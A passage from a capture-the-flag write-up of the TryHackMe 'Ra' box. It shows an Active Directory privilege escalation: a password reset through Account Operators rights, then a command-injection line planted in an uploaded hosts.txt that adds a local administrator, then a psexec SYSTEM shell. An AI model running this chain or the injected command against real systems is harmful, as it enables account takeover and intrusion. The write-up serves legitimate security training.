System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.SetContentCommandAvailable count: 0Not available count: 0Not available hosts:Sleeping 45 seconds10/14/2022 10:16:02 AM
Since we are part of the Account Operators group let’s reset the password for the account “brittanycr”.
*Evil-WinRM* PS C:\scripts> net user brittanycr hello123#The command completed successfully.*Evil-WinRM* PS C:\scripts>
So now let’s access edit that hosts.txt file and create a new Admin user!
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ crackmapexec smb windcorp.thm -u brittanycr -p 'hello123#'SMB 10.10.226.131 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)SMB 10.10.226.131 445 FIRE [+] windcorp.thm\brittanycr:hello123#┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ crackmapexec winrm windcorp.thm -u brittanycr -p 'hello123#'WINRM 10.10.226.131 5985 FIRE [*] http://10.10.226.131:5985/wsmanWINRM 10.10.226.131 5985 FIRE [-] WINDCORP\brittanycr:hello123# "Failed to authenticate the user brittanycr with ntlm"
It seems we can’t psexec or winrm into the box as brittanycr. Let’s use smbclient to put our malicious hosts.txt file.
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ smbclient -U 'brittanycr' //windcorp.thm/UsersEnter WORKGROUP\brittanycr's password:Try "help" to get a list of possible commands.smb: \> cd brittanycr\smb: \brittanycr\> dir. D 0 Sun May 3 05:06:46 2020.. D 0 Sun May 3 05:06:46 2020hosts.txt A 22 Sun May 3 19:14:57 202015587583 blocks of size 4096. 10891432 blocks available
Let’s make our malicious hosts.txt file:
net user sid hello!123 /add;net localgroup Administrators sid /addNow let’s put it using smbclient.
smb: \brittanycr\> put hosts.txtputting file hosts.txt as \brittanycr\hosts.txt (0.2 kb/s) (average 0.2 kb/s)smb: \brittanycr\> exit
Let’s verify if it worked, we can use crackmapexec for this.
┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ crackmapexec smb windcorp.thm -u sid -p 'hello!123'SMB 10.10.226.131 445 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)SMB 10.10.226.131 445 FIRE [+] windcorp.thm\sid:hello!123 (Pwn3d!)┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py sid@windcorp.thmImpacket v0.9.21 - Copyright 2020 SecureAuth CorporationPassword:[*] Requesting shares on windcorp.thm.....[*] Found writable share ADMIN$[*] Uploading file cfKhdeUq.exe[*] Opening SVCManager on windcorp.thm.....[*] Creating service TNal on windcorp.thm.....[*] Starting service TNal.....[!] Press help for extra shell commandsMicrosoft Windows [Version 10.0.17763.1158](c) 2018 Microsoft Corporation. All rights reserved.C:\Windows\system32>cd c:\users\Administrator\Desktopc:\Users\Administrator\Desktop>dirVolume in drive C has no label.Volume Serial Number is 84E1-0562Directory of c:\Users\Administrator\Desktop05/10/2020 03:17 AM <DIR> .05/10/2020 03:17 AM <DIR> ..05/07/2020 12:22 AM 47 Flag3.txt1 File(s) 47 bytes2 Dir(s) 44,605,804,544 bytes freec:\Users\Administrator\Desktop>type "Flag3.txt"THM{ba3a2bff2e******************************}c:\Users\Administrator\Desktop>
And that was the box.
